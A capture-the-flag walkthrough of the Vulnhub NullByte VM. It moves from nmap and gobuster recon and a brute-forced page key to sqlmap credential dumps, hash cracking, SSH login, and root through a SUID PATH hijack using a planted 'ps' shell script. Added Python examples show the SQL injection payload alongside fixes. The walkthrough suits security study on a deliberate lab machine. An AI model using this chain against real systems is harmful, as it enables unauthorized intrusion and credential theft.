INIT
identify target IP
➜ ~ nmap -sP 172.16.129.128/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 11:48 EDT
Nmap scan report for Home (172.16.129.1)
Host is up (0.00056s latency).
Nmap scan report for 172.16.129.2
Host is up (0.00033s latency).
Nmap scan report for 172.16.129.128
Host is up (0.0011s latency).
Nmap scan report for 172.16.129.141
Host is up (0.0010s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.35 seconds
edit the /etc/hosts file (local DNS)
# Vulnhub
172.16.129.141 nullbyte.vuln
let's start …
Scanning
Nmap
➜ ~ sudo nmap -A -p- -T4 nullbyte.vuln
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 11:51 EDT
Nmap scan report for nullbyte.vuln (172.16.129.141)
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34372/tcp6 status
| 100024 1 45260/tcp status
| 100024 1 53470/udp6 status
|_ 100024 1 58576/udp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
45260/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:72:55:45 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.42 ms nullbyte.vuln (172.16.129.141)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.42 seconds
Enumeration
port 80
landing page
Whatweb
➜ ~ sudo whatweb nullbyte.vuln
http://nullbyte.vuln [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[172.16.129.141], Title[Null Byte 00 - level 1]
Check directories
➜ ~ gobuster dir -u http://nullbyte.vuln -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://nullbyte.vuln
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/13 11:56:52 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 297]
/.htaccess (Status: 403) [Size: 297]
/javascript (Status: 301) [Size: 319] [--> http://nullbyte.vuln/javascript/]
/phpmyadmin (Status: 301) [Size: 319] [--> http://nullbyte.vuln/phpmyadmin/]
/server-status (Status: 403) [Size: 301]
/uploads (Status: 301) [Size: 316] [--> http://nullbyte.vuln/uploads/]
===============================================================
2021/08/13 11:56:57 Finished
===============================================================
This challenge is CTF style …
IMG Metadata
let's check the metadata of the landing page image
➜ ~ curl http://nullbyte.vuln/main.gif -o img | exiftool img
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 16647 100 16647 0 0 2709k 0 --:--:-- --:--:-- --:--:-- 2709k
ExifTool Version Number : 12.16
File Name : img
Directory : .
File Size : 16 KiB
File Modification Date/Time : 2021:08:13 14:31:44-04:00
File Access Date/Time : 2021:08:13 14:31:44-04:00
File Inode Change Date/Time : 2021:08:13 14:31:44-04:00
File Permissions : rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071
this line is interesting
Comment : P-): kzMb5nVYJw
intercept this page
brute forcing is the only way
Exploiting
Brute forcing key
go for Burp Intruder
for the payload I will use SecLists SecLists/Passwords/Common-Credentials/10k-most-common.txt
elite is the key
press <enter_key>
only an empty input field
SQLmap
run SQLmap against this input field
# identify DB
➜ ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=x' --dbs
. . .
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
. . .

# dump data
➜ ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=' --batch --dump -C User,Password -T user -D mysql
. . .
+------------------+-------------------------------------------------------+
| User | Password |
+------------------+-------------------------------------------------------+
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC |
| phpmyadmin | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
+------------------+-------------------------------------------------------+
. . .
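The hole sqlmap drove through above is a search parameter spliced into the query text. As an added example (not code from the writeup or from the VM), this is a SQLite stand-in for the usrtosearch lookup with a constructed users table: the string-built query beside the parameterized one that closes it. Column names and row contents are assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the 'seth' database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, user TEXT, pass TEXT, position TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "ramses", "HASH-PLACEHOLDER-1", "Admin"),      # constructed
        (2, "isis", "HASH-PLACEHOLDER-2", "Employee"),     # constructed
    ])
    return con


def search_vulnerable(con, usrtosearch):
    # The user-controlled value is concatenated straight into the SQL text,
    # so a quote in it ends the string literal and the rest becomes SQL.
    sql = "SELECT user, position FROM users WHERE user LIKE '%" + usrtosearch + "%'"
    return con.execute(sql).fetchall()


def search_safe(con, usrtosearch):
    # The value travels as a bound parameter; quotes in it are just data
    # and the query shape is fixed before any user input is seen.
    sql = "SELECT user, position FROM users WHERE user LIKE ?"
    return con.execute(sql, ("%" + usrtosearch + "%",)).fetchall()


def demo():
    con = make_db()
    # The classic boolean tautology sqlmap tries early; the trailing comment
    # marker swallows the "%'" left over from the original query.
    payload = "x%' OR 1=1 -- "
    return {
        "normal": search_safe(con, "ram"),            # [('ramses', 'Admin')]
        "vulnerable": search_vulnerable(con, payload),  # every row leaks
        "safe": search_safe(con, payload),            # no match: []
    }
```

Logging the raw parameter value alongside the query (as the safe variant allows, since the value never changes the SQL) is also what makes this kind of probe visible in the web server's access log.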
Remember: we have a /phpmyadmin directory (from the gobuster output)
Credentials : root:sunnyvale
phpMyAdmin
dive into database seth, table users
Credentials : ramses
the password is hashed, let's crack it :)
YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
base64 decode:
c6d6bd7ebf806f43c76acc3681703b81
crack the hash
omega
I used hashes.com for the whole process
Credentials : ramses:omega
SSH Connection
now let's connect to the machine using SSH on port 777
➜ ~ ssh ramses@nullbyte.vuln -p 777
The authenticity of host '[nullbyte.vuln]:777 ([172.16.129.141]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nullbyte.vuln]:777,[172.16.129.141]:777' (ECDSA) to the list of known hosts.
ramses@nullbyte.vuln's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$
- Regular User Account Access
Privilege Escalation
SUID binary
ramses@NullByte:/var/www/backup$ find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
this file looks … interesting :joy: /var/www/backup/procwatch
let's take a look …
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1487 pts/0 00:00:00 procwatch
1488 pts/0 00:00:00 sh
1489 pts/0 00:00:00 ps
this binary runs the ps command by bare name, so the shell looks it up through our PATH; let's abuse that
ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:$PATH
ramses@NullByte:/var/www/backup$ touch ps
ramses@NullByte:/var/www/backup$ echo '/bin/sh -i' > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
root
- Root User Account Access
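Why the PATH trick above works, and what the fix looks like, as an added example (not code from the writeup or from the VM): a setuid program that calls ps by bare name lets /bin/sh walk the caller's PATH, so any writable directory listed before /bin wins. The code models that lookup inside a temporary directory, with "backup" and "bin" standing in for /var/www/backup and /bin, and includes the audit a defender runs to find such hijack points.

```python
import os
import stat
import tempfile


def resolve_command(cmd, path_env):
    """First executable named cmd along path_env, as /bin/sh would pick it."""
    for d in path_env.split(":"):
        candidate = os.path.join(d or ".", cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def writable_dirs_ahead(path_env, trusted_dirs):
    """PATH entries the current user can write to that are searched before
    the first trusted directory: each one can shadow a bare command name."""
    found = []
    for d in path_env.split(":"):
        if d in trusted_dirs:
            break
        if os.path.isdir(d) and os.access(d, os.W_OK):
            found.append(d)
    return found


def _plant(directory, name, body):
    path = os.path.join(directory, name)
    with open(path, "w") as f:
        f.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path


def demo():
    root = tempfile.mkdtemp()                    # constructed sandbox
    sys_bin = os.path.join(root, "bin")          # stands in for /bin
    backup = os.path.join(root, "backup")        # stands in for /var/www/backup
    os.mkdir(sys_bin)
    os.mkdir(backup)
    real_ps = _plant(sys_bin, "ps", "#!/bin/sh\necho real ps\n")
    fake_ps = _plant(backup, "ps", "#!/bin/sh\necho planted ps\n")
    attacker_path = backup + ":" + sys_bin       # export PATH=/var/www/backup:$PATH
    hardened_path = sys_bin  # a fixed PATH the setuid program sets itself before system()
    return {
        "insecure": resolve_command("ps", attacker_path),   # the planted copy
        "hardened": resolve_command("ps", hardened_path),   # the real one
        "hijack_points": writable_dirs_ahead(attacker_path, {sys_bin}),
        "real_ps": real_ps, "fake_ps": fake_ps, "backup": backup,
    }
```

The same shadowing applies to any setuid or root-run script that invokes helpers by bare name; invoking them by absolute path, or resetting PATH before the call, removes the caller's control.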
github page : https://maaelhamid.github.io/posts/NULLBYTE/